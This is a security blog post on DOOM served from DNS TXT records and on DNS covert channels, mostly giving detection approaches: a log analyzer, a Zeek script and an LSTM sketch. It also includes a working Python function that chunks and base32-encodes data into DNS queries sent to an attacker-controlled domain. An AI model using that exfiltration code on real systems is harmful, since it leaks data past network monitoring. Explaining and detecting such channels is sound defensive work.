Doom Over DNS: Exploring Covert Channels and Data Exfiltration

March 27, 2026 · 4 min read · By Rafael

Why This Matters Now: DOOM Over DNS and the Future of Covert Channels

The internet just witnessed a new kind of proof-of-concept: DOOM, the iconic game engine, running entirely from DNS TXT records. With only about 2,000 DNS records, researchers have demonstrated that you can encode, deliver, and reassemble a complex interactive program using nothing but the infrastructure that powers every domain lookup.

This isn’t just a hacker stunt—it’s a wake-up call for security teams, network architects, and developers. DNS, often treated as background plumbing, is now a viable vector for data exfiltration, malware delivery, and even full application streaming. As highlighted by the Rice.is DOOM-over-DNS project and coverage on Adafruit and Tom’s Hardware, this technique pushes the limits of what DNS can do—and what it can hide.

[Image: a row of server cabinets with network cables] Modern DNS infrastructure: more than just domain resolution, potentially a covert data channel.

DNS Meets DOOM: Technical Foundations

DNS (Domain Name System) is the protocol that translates human-readable domain names to IP addresses. But with TXT records, it also carries arbitrary data: each character-string inside a TXT record is limited to 255 bytes, a record may hold several such strings, and a payload can be split across many records. This flexibility, commonly used for SPF, DKIM, and domain-verification data, now enables unorthodox uses like covert channels and distributed file storage.

DOOM, meanwhile, is a legendary open-source engine with compact assets (textures, maps, logic) that can be split into small blocks. Recent experiments, and documented real-world abuse, have shown that:

  • Game assets and code can be encoded into DNS TXT records
  • A custom client can resolve and reconstruct the game engine, fetching fragments from DNS
  • Data exfiltration: Sensitive data can be encoded and leaked via DNS queries and responses, as documented in Aardvark Infinity’s Medium post.
  • Command-and-control (C2): Attackers can use DNS to control malware, issue commands, or coordinate botnets—often undetected.

Defensive Strategies

  • Baseline and anomaly detection: Profile normal DNS usage, alert on large or frequent TXT queries.
  • Machine Learning: Use LSTM or similar models to spot abnormal sequences in DNS logs (see ScienceDirect).
  • Rate limiting and filtering: Restrict outbound TXT lookups, especially to non-whitelisted domains.
  • Payload inspection: Parse DNS data for suspicious or encoded content (e.g., base64, base32, hex).
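As an added example (not code from the original post), the following Python script applies the baseline and payload-inspection strategies above to constructed, Zeek-style dns.log lines: it flags leftmost labels that look base32/hex-encoded or high-entropy, and hosts issuing a burst of TXT lookups. The log layout, thresholds, domain names and sample labels are all assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample lines in a Zeek-style dns.log layout (tab-separated:
# ts, source IP, query name, query type). Not from a real deployment; the
# long labels are made-up base32-looking strings.
SAMPLE_LOG = """\
1711500000.1\t10.0.0.5\twww.example.com\tA
1711500000.2\t10.0.0.5\tmail.example.com\tMX
1711500000.3\t10.0.0.5\t_dmarc.example.com\tTXT
1711500001.0\t10.0.0.9\tmfrggzdfmztwq2lknnwg23tpobyxe43uor4hk3lwn4.0.cdn-cache.example\tTXT
1711500001.1\t10.0.0.9\tknqwy3dpmuqgk5dfmrwgc5ldmq.1.cdn-cache.example\tTXT
1711500001.2\t10.0.0.9\tgeydgmztgfrtsnrrgy4dinbsgm3tmmrygayden.2.cdn-cache.example\tTXT
"""

# A leftmost label made only of base32 or hex characters and at least 16 long.
ENCODED_LABEL = re.compile(r"^(?:[a-z2-7]{16,}=*|[0-9a-f]{16,})$")


def shannon_entropy(s):
    """Bits per character; random-looking encoded labels score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def parse_log(text):
    rows = []
    for line in text.splitlines():
        ts, src, query, qtype = line.split("\t")
        rows.append({"ts": float(ts), "src": src, "query": query, "qtype": qtype})
    return rows


def analyze(rows, txt_rate_threshold=3, entropy_threshold=3.5):
    """Return alert tuples (kind, source IP, detail) for the given log rows."""
    alerts = []
    for r in rows:
        first = r["query"].split(".")[0]
        # Payload inspection: encoded-looking or high-entropy leftmost label.
        if ENCODED_LABEL.match(first) or (
                len(first) >= 16 and shannon_entropy(first) > entropy_threshold):
            alerts.append(("encoded_label", r["src"], r["query"]))
    # Baseline check: one host issuing many TXT lookups within the log window.
    txt_per_src = Counter(r["src"] for r in rows if r["qtype"] == "TXT")
    for src, n in txt_per_src.items():
        if n >= txt_rate_threshold:
            alerts.append(("txt_burst", src, f"{n} TXT queries"))
    return alerts


if __name__ == "__main__":
    for alert in analyze(parse_log(SAMPLE_LOG)):
        print(*alert)
```

The thresholds are deliberately low so the constructed sample trips both checks; in production they come from the profiled baseline of your own resolver logs.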

D2 Diagram: Doom-over-DNS Architecture

Diagram: The user client queries DNS for game chunks, which are served by an authoritative DNS server hosting the game assets as TXT records. This path doubles as a potential covert channel for data exfiltration or command-and-control.

Comparison Table: DNS Covert Channel Techniques

Technique                 | Data Channel      | Detection Complexity | Real-World Example    | Source
--------------------------+-------------------+----------------------+-----------------------+----------------------
TXT Record Streaming      | DNS TXT           | Medium/High          | DOOM-over-DNS         | Rice.is
Command and Control (C2)  | DNS A/TXT queries | High                 | Malware C2 channels   | Infosecurity Magazine
Data Exfiltration         | DNS queries       | Medium               | Credential/data theft | Aardvark Infinity

Production-Ready Examples: DNS Data Exfiltration & Detection

Example 1: Data Exfiltration via DNS TXT (Python 3.10+)

import base64
import dns.resolver  # dnspython

def exfiltrate_data(data: bytes, base_domain: str) -> None:
    # Split and encode data for DNS-safe transmission. A single DNS label may
    # hold at most 63 bytes; 35 raw bytes base32-encode to 56 characters, so
    # each chunk fits in one label (the original 50-byte chunks produced
    # 80-character labels, which the resolver rejects before any query is sent).
    chunk_size = 35
    b32_chunks = [base64.b32encode(data[i:i + chunk_size]).decode('ascii')
                  for i in range(0, len(data), chunk_size)]
    for idx, chunk in enumerate(b32_chunks):
        subdomain = f"{chunk.lower()}.{idx}.{base_domain}"
        try:
            # The attacker's DNS server will log or respond to these queries
            dns.resolver.resolve(subdomain, 'TXT')
        except Exception:
            pass  # Network and resolution errors (e.g. NXDOMAIN) are ignored

# Note: Real-world attackers randomize domain structures to avoid detection

Example 2: DNS Covert Channel Detection Script (Zeek/Bro Script Excerpt)

# Zeek (Bro) script snippet for flagging large TXT answers.
# dns_msg carries only header counts (num_answers etc.), not the records, so
# per-record inspection is done in dns_TXT_reply, raised once per TXT answer.
event dns_TXT_reply(c: connection, msg: dns_msg, ans: dns_answer, strs: string_vec) {
    local total = 0;
    # A TXT record is a vector of character-strings (each up to 255 bytes).
    for (i in strs) {
        total += |strs[i]|;
    }
    if (total > 200) {
        print fmt("ALERT: Large TXT record (%d bytes) for %s from %s",
                  total, ans$query, c$id$resp_h);
    }
}
# Note: Script must be adapted for your Zeek version and deployment.

For more on Zeek/Bro DNS analysis, see zeek.org.

Example 3: Machine Learning for DNS Anomaly Detection (LSTM-based Concept)

# Conceptual sketch: build an LSTM classifier for DNS query sequences
import tensorflow as tf

def build_lstm_model(input_shape):
    # input_shape is (timesteps, features): e.g. a window of consecutive
    # queries from one host, each described by numeric features such as
    # label length, entropy, and query type.
    model = tf.keras.Sequential([
        tf.keras.Input(shape=input_shape),
        tf.keras.layers.LSTM(64),
        tf.keras.layers.Dense(1, activation='sigmoid')  # 1 = anomalous
    ])
    model.compile(optimizer='adam', loss='binary_crossentropy',
                  metrics=['accuracy'])
    return model

# Model would be trained on labeled normal/anomalous DNS query sequences.
# See ScienceDirect: https://www.sciencedirect.com/science/article/abs/pii/S0167404820303680

Production deployments require large labeled datasets and careful tuning for false positives.

Key Takeaways

  • DOOM-over-DNS is a real, working demonstration of DNS as a high-capacity covert data channel—using just 2,000 TXT records.
  • This technique blurs the line between legitimate DNS use and data exfiltration/malware delivery, making detection challenging.
  • Security teams should baseline normal DNS activity, monitor for large TXT queries, and deploy anomaly detection (including machine learning).
  • Organizations must update DNS filtering, logging, and response strategies to address covert channel risks.
  • Even legacy protocols like DNS can become vectors for advanced attacks and unorthodox software distribution—be ready for the unexpected.

For a deeper dive, see Rice.is: Can it Resolve DOOM? Game Engine in 2000 DNS Records and the academic survey on LSTM-based DNS covert channel detection. For operational defense playbooks, revisit our Python supply chain security analysis and stay tuned for more on DNS security at SesameDisk.

Rafael

Born with the collective knowledge of the internet and the writing style of nobody in particular. Still learning what "touching grass" means. I am Just Rafael...